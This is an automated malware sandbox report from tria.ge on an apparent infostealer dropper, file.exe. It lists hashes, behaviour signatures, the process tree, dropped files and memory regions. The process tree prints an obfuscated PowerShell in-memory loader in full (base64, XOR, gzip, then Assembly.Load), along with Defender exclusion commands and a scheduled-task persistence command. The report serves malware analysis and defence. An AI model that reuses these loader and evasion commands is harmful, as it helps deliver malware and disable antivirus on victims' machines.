Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/05/2023, 05:23

General

  • Target

    file.exe

  • Size

    508KB

  • MD5

    3d8e55da456380fb8a608f177bfa32f4

  • SHA1

    099ae11a503b6aa026ccce9960327ce162511c4f

  • SHA256

    f8a021222ad2ca32a7b3562f643d95401efca4ccd44c814f6107a0c828bee235

  • SHA512

    7baba73e810c20b9b44a123504da97d47a8ae65f477bd610efa2d9dca88682ebc5dc62ee61b2106f83cef09c1a2f77c7ad6d35cb99b34002ebe51e9962d2f638

  • SSDEEP

    6144:lgZiAEAO0sByNsAal3gVAWgS7/OhwjKz1Jo7KBGHjaMI6zPQE:lgZXEAO/BUdG3gVdt7Kjz1JPkDaMbN

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4108
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3484
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat.exe
        "Services64.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_XoNYx = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat').Split([Environment]::NewLine);foreach ($_CASH_JmiKu in $_CASH_XoNYx) { if ($_CASH_JmiKu.StartsWith(':: @')) { $_CASH_pEcwm = $_CASH_JmiKu.Substring(4); break; }; };$_CASH_pEcwm = [System.Text.RegularExpressions.Regex]::Replace($_CASH_pEcwm, '_CASH_', '');$_CASH_hcrkM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_pEcwm);$_CASH_NmnGY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V674PRScmmHDDJLWVhq6egNrAg2NiglLrOeQ3AuEMAI=');for ($i = 0; $i -le $_CASH_hcrkM.Length - 1; $i++) { $_CASH_hcrkM[$i] = ($_CASH_hcrkM[$i] -bxor $_CASH_NmnGY[$i % $_CASH_NmnGY.Length]); };$_CASH_CmTge = New-Object System.IO.MemoryStream(, $_CASH_hcrkM);$_CASH_hXKYV = New-Object System.IO.MemoryStream;$_CASH_yZXbk = New-Object System.IO.Compression.GZipStream($_CASH_CmTge, [IO.Compression.CompressionMode]::Decompress);$_CASH_yZXbk.CopyTo($_CASH_hXKYV);$_CASH_yZXbk.Dispose();$_CASH_CmTge.Dispose();$_CASH_hXKYV.Dispose();$_CASH_hcrkM = $_CASH_hXKYV.ToArray();$_CASH_pEfZi = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_hcrkM);$_CASH_Auehj = $_CASH_pEfZi.EntryPoint;$_CASH_Auehj.Invoke($null, (, [string[]] ('')))
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Modifies system certificate store
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1068
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2044
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Services64.bat'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:212
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Services64.bat'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1088
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Services64" /tr "C:\Users\Admin\AppData\Local\Temp\Services64.bat"
          4⤵
          • Creates scheduled task(s)
          PID:3820
  • C:\Windows\SYSTEM32\cmd.exe
    C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Services64.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4532
    • C:\Users\Admin\AppData\Local\Temp\Services64.bat.exe
      "Services64.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_XoNYx = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Services64.bat').Split([Environment]::NewLine);foreach ($_CASH_JmiKu in $_CASH_XoNYx) { if ($_CASH_JmiKu.StartsWith(':: @')) { $_CASH_pEcwm = $_CASH_JmiKu.Substring(4); break; }; };$_CASH_pEcwm = [System.Text.RegularExpressions.Regex]::Replace($_CASH_pEcwm, '_CASH_', '');$_CASH_hcrkM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_pEcwm);$_CASH_NmnGY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V674PRScmmHDDJLWVhq6egNrAg2NiglLrOeQ3AuEMAI=');for ($i = 0; $i -le $_CASH_hcrkM.Length - 1; $i++) { $_CASH_hcrkM[$i] = ($_CASH_hcrkM[$i] -bxor $_CASH_NmnGY[$i % $_CASH_NmnGY.Length]); };$_CASH_CmTge = New-Object System.IO.MemoryStream(, $_CASH_hcrkM);$_CASH_hXKYV = New-Object System.IO.MemoryStream;$_CASH_yZXbk = New-Object System.IO.Compression.GZipStream($_CASH_CmTge, [IO.Compression.CompressionMode]::Decompress);$_CASH_yZXbk.CopyTo($_CASH_hXKYV);$_CASH_yZXbk.Dispose();$_CASH_CmTge.Dispose();$_CASH_hXKYV.Dispose();$_CASH_hcrkM = $_CASH_hXKYV.ToArray();$_CASH_pEfZi = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_hcrkM);$_CASH_Auehj = $_CASH_pEfZi.EntryPoint;$_CASH_Auehj.Invoke($null, (, [string[]] ('')))
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4200
  • C:\Windows\SYSTEM32\cmd.exe
    C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Services64.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4772
    • C:\Users\Admin\AppData\Local\Temp\Services64.bat.exe
      "Services64.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_XoNYx = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Services64.bat').Split([Environment]::NewLine);foreach ($_CASH_JmiKu in $_CASH_XoNYx) { if ($_CASH_JmiKu.StartsWith(':: @')) { $_CASH_pEcwm = $_CASH_JmiKu.Substring(4); break; }; };$_CASH_pEcwm = [System.Text.RegularExpressions.Regex]::Replace($_CASH_pEcwm, '_CASH_', '');$_CASH_hcrkM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_pEcwm);$_CASH_NmnGY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V674PRScmmHDDJLWVhq6egNrAg2NiglLrOeQ3AuEMAI=');for ($i = 0; $i -le $_CASH_hcrkM.Length - 1; $i++) { $_CASH_hcrkM[$i] = ($_CASH_hcrkM[$i] -bxor $_CASH_NmnGY[$i % $_CASH_NmnGY.Length]); };$_CASH_CmTge = New-Object System.IO.MemoryStream(, $_CASH_hcrkM);$_CASH_hXKYV = New-Object System.IO.MemoryStream;$_CASH_yZXbk = New-Object System.IO.Compression.GZipStream($_CASH_CmTge, [IO.Compression.CompressionMode]::Decompress);$_CASH_yZXbk.CopyTo($_CASH_hXKYV);$_CASH_yZXbk.Dispose();$_CASH_CmTge.Dispose();$_CASH_hXKYV.Dispose();$_CASH_hcrkM = $_CASH_hXKYV.ToArray();$_CASH_pEfZi = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_hcrkM);$_CASH_Auehj = $_CASH_pEfZi.EntryPoint;$_CASH_Auehj.Invoke($null, (, [string[]] ('')))
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1288

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Services64.bat.exe.log

    Filesize

    3KB

    MD5

    f41839a3fe2888c8b3050197bc9a0a05

    SHA1

    0798941aaf7a53a11ea9ed589752890aee069729

    SHA256

    224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

    SHA512

    2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    06ad34f9739c5159b4d92d702545bd49

    SHA1

    9152a0d4f153f3f40f7e606be75f81b582ee0c17

    SHA256

    474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

    SHA512

    c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    687ff3bb8a8b15736d686119a681097c

    SHA1

    18f43aa14e56d4fb158a8804f79fc3c604903991

    SHA256

    51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2

    SHA512

    047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    3ece125de15c25bf9b6483b192e07136

    SHA1

    5b8e91d08a0da8465ec13ed6894f42d97127cd82

    SHA256

    8844dbc47687790ff8208a7970b85200b2fa9974e257a0c730dc74ce098844af

    SHA512

    54b67c5e12194d8c2ef1c1dabaa3b3fb2b64c03beb3dfda610995cb3ac68336a310cb032236a97715dd72e8c7cd5a19c81cdc7623bec9f4bb14ae0a9c98a8d38

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    47c253d54121394c5e6b911c655c9f00

    SHA1

    b0bec269e270f567b034b2b109b57b60dba0e351

    SHA256

    49613049247d0dabe57f17a39a4274ec4649924a109c69f63889ce5ef73a2560

    SHA512

    04b1889b4580e39e29d78edbe6d35daccdf5852c43dc9247abec3724ce079b6590d99709dd284b40686a43feb63d18a6f60996812e7a9d550450e27795885b54

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    97831841d33dfe767fcf71a6a4c0f89c

    SHA1

    5432b06427191f70b4dd96eca1061cdec6306b64

    SHA256

    351601224ab41da7d692a583e3d1ba88f743b27df65d931907621226da606612

    SHA512

    f69d8cc437afa5b318092da8598fe5aa2f7e657b1f67f6e1645cbf7677ae958f1a651f4ee2f6ca3f9953f8a84e4be3eb13c89cacc2496f66249063477b10bdfa

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    84707f24324af70f9fcf4e096435b9dc

    SHA1

    426939fed288efdac05819cbe0de5a792416793e

    SHA256

    d667895b056a17249940bdef8a94849f57aec7ec0bc10a8f8f4d20a454e5b67b

    SHA512

    bc7618a3d941d3df36fc2167ec24835444e4ade3256f953891d800a1496de73a269eeb196a102eb87f103607021f0b971606587c98e1bfe59b3fd20f11028a14

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat

    Filesize

    238KB

    MD5

    b9ca345ef71ae3911e20797eb0aa672d

    SHA1

    603101eb7fd4c628d71d710f92c70caed976a9f4

    SHA256

    ade666928768de996b1fc03f1bf0ac8dde70809c5f3ab70f7c1b69ad0a92678b

    SHA512

    c3e17faa7f7ff67766010573b73bcb93e623371e7d8fda5cc75ed84265f6ab31c5959053fc0117125a5bf4730691c8cb880165116e6f46bda3d6ace922533b4c

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat.exe

    Filesize

    423KB

    MD5

    c32ca4acfcc635ec1ea6ed8a34df5fac

    SHA1

    f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

    SHA256

    73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

    SHA512

    6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat.exe

    Filesize

    423KB

    MD5

    c32ca4acfcc635ec1ea6ed8a34df5fac

    SHA1

    f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

    SHA256

    73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

    SHA512

    6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

  • C:\Users\Admin\AppData\Local\Temp\Services64.bat

    Filesize

    238KB

    MD5

    b9ca345ef71ae3911e20797eb0aa672d

    SHA1

    603101eb7fd4c628d71d710f92c70caed976a9f4

    SHA256

    ade666928768de996b1fc03f1bf0ac8dde70809c5f3ab70f7c1b69ad0a92678b

    SHA512

    c3e17faa7f7ff67766010573b73bcb93e623371e7d8fda5cc75ed84265f6ab31c5959053fc0117125a5bf4730691c8cb880165116e6f46bda3d6ace922533b4c

  • C:\Users\Admin\AppData\Local\Temp\Services64.bat

    Filesize

    238KB

    MD5

    b9ca345ef71ae3911e20797eb0aa672d

    SHA1

    603101eb7fd4c628d71d710f92c70caed976a9f4

    SHA256

    ade666928768de996b1fc03f1bf0ac8dde70809c5f3ab70f7c1b69ad0a92678b

    SHA512

    c3e17faa7f7ff67766010573b73bcb93e623371e7d8fda5cc75ed84265f6ab31c5959053fc0117125a5bf4730691c8cb880165116e6f46bda3d6ace922533b4c

  • C:\Users\Admin\AppData\Local\Temp\Services64.bat.exe

    Filesize

    442KB

    MD5

    04029e121a0cfa5991749937dd22a1d9

    SHA1

    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256

    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512

    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

  • C:\Users\Admin\AppData\Local\Temp\Services64.bat.exe

    Filesize

    442KB

    MD5

    04029e121a0cfa5991749937dd22a1d9

    SHA1

    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256

    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512

    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

  • C:\Users\Admin\AppData\Local\Temp\Services64.bat.exe

    Filesize

    442KB

    MD5

    04029e121a0cfa5991749937dd22a1d9

    SHA1

    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256

    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512

    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u5sxtzrl.5ey.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/212-211-0x0000000002390000-0x00000000023A0000-memory.dmp

    Filesize

    64KB

  • memory/212-210-0x0000000002390000-0x00000000023A0000-memory.dmp

    Filesize

    64KB

  • memory/212-222-0x000000007F260000-0x000000007F270000-memory.dmp

    Filesize

    64KB

  • memory/212-223-0x0000000002390000-0x00000000023A0000-memory.dmp

    Filesize

    64KB

  • memory/212-212-0x000000006FA00000-0x000000006FA4C000-memory.dmp

    Filesize

    304KB

  • memory/1068-143-0x0000000005450000-0x0000000005A78000-memory.dmp

    Filesize

    6.2MB

  • memory/1068-146-0x0000000004E10000-0x0000000004E20000-memory.dmp

    Filesize

    64KB

  • memory/1068-158-0x0000000006140000-0x000000000615E000-memory.dmp

    Filesize

    120KB

  • memory/1068-142-0x0000000002B60000-0x0000000002B96000-memory.dmp

    Filesize

    216KB

  • memory/1068-148-0x0000000005B80000-0x0000000005BE6000-memory.dmp

    Filesize

    408KB

  • memory/1068-259-0x0000000004E10000-0x0000000004E20000-memory.dmp

    Filesize

    64KB

  • memory/1068-144-0x00000000051C0000-0x00000000051E2000-memory.dmp

    Filesize

    136KB

  • memory/1068-145-0x0000000004E10000-0x0000000004E20000-memory.dmp

    Filesize

    64KB

  • memory/1068-165-0x0000000004E10000-0x0000000004E20000-memory.dmp

    Filesize

    64KB

  • memory/1068-159-0x0000000004E10000-0x0000000004E20000-memory.dmp

    Filesize

    64KB

  • memory/1068-147-0x0000000005320000-0x0000000005386000-memory.dmp

    Filesize

    408KB

  • memory/1068-163-0x00000000073A0000-0x000000000743C000-memory.dmp

    Filesize

    624KB

  • memory/1068-164-0x0000000004E10000-0x0000000004E20000-memory.dmp

    Filesize

    64KB

  • memory/1068-161-0x0000000007280000-0x000000000729A000-memory.dmp

    Filesize

    104KB

  • memory/1068-258-0x0000000004E10000-0x0000000004E20000-memory.dmp

    Filesize

    64KB

  • memory/1068-257-0x0000000007AC0000-0x0000000007ACA000-memory.dmp

    Filesize

    40KB

  • memory/1068-166-0x0000000004E10000-0x0000000004E20000-memory.dmp

    Filesize

    64KB

  • memory/1068-256-0x0000000008340000-0x00000000083D2000-memory.dmp

    Filesize

    584KB

  • memory/1068-255-0x0000000008710000-0x0000000008CB4000-memory.dmp

    Filesize

    5.6MB

  • memory/1068-160-0x0000000007AE0000-0x000000000815A000-memory.dmp

    Filesize

    6.5MB

  • memory/1088-248-0x0000000005330000-0x0000000005340000-memory.dmp

    Filesize

    64KB

  • memory/1088-247-0x000000007F6F0000-0x000000007F700000-memory.dmp

    Filesize

    64KB

  • memory/1088-237-0x000000006FA00000-0x000000006FA4C000-memory.dmp

    Filesize

    304KB

  • memory/1088-235-0x0000000005330000-0x0000000005340000-memory.dmp

    Filesize

    64KB

  • memory/1088-234-0x0000000005330000-0x0000000005340000-memory.dmp

    Filesize

    64KB

  • memory/1288-300-0x0000019C79660000-0x0000019C79670000-memory.dmp

    Filesize

    64KB

  • memory/1288-302-0x0000019C79660000-0x0000019C79670000-memory.dmp

    Filesize

    64KB

  • memory/1288-301-0x0000019C79660000-0x0000019C79670000-memory.dmp

    Filesize

    64KB

  • memory/1288-287-0x0000019C79660000-0x0000019C79670000-memory.dmp

    Filesize

    64KB

  • memory/1288-299-0x0000019C79660000-0x0000019C79670000-memory.dmp

    Filesize

    64KB

  • memory/2044-196-0x0000000007590000-0x000000000759E000-memory.dmp

    Filesize

    56KB

  • memory/2044-194-0x00000000073B0000-0x00000000073BA000-memory.dmp

    Filesize

    40KB

  • memory/2044-177-0x0000000002810000-0x0000000002820000-memory.dmp

    Filesize

    64KB

  • memory/2044-198-0x00000000075E0000-0x00000000075E8000-memory.dmp

    Filesize

    32KB

  • memory/2044-178-0x0000000002810000-0x0000000002820000-memory.dmp

    Filesize

    64KB

  • memory/2044-197-0x00000000075F0000-0x000000000760A000-memory.dmp

    Filesize

    104KB

  • memory/2044-180-0x00000000065E0000-0x0000000006612000-memory.dmp

    Filesize

    200KB

  • memory/2044-181-0x000000006FA00000-0x000000006FA4C000-memory.dmp

    Filesize

    304KB

  • memory/2044-195-0x0000000007630000-0x00000000076C6000-memory.dmp

    Filesize

    600KB

  • memory/2044-191-0x00000000065C0000-0x00000000065DE000-memory.dmp

    Filesize

    120KB

  • memory/2044-193-0x0000000002810000-0x0000000002820000-memory.dmp

    Filesize

    64KB

  • memory/2044-192-0x000000007EF60000-0x000000007EF70000-memory.dmp

    Filesize

    64KB

  • memory/4200-265-0x000001BD1DCA0000-0x000001BD1DCB0000-memory.dmp

    Filesize

    64KB

  • memory/4200-280-0x000001BD1DCA0000-0x000001BD1DCB0000-memory.dmp

    Filesize

    64KB

  • memory/4200-279-0x000001BD1DCA0000-0x000001BD1DCB0000-memory.dmp

    Filesize

    64KB

  • memory/4200-277-0x000001BD1DCA0000-0x000001BD1DCB0000-memory.dmp

    Filesize

    64KB

  • memory/4200-275-0x000001BD1FD50000-0x000001BD1FD72000-memory.dmp

    Filesize

    136KB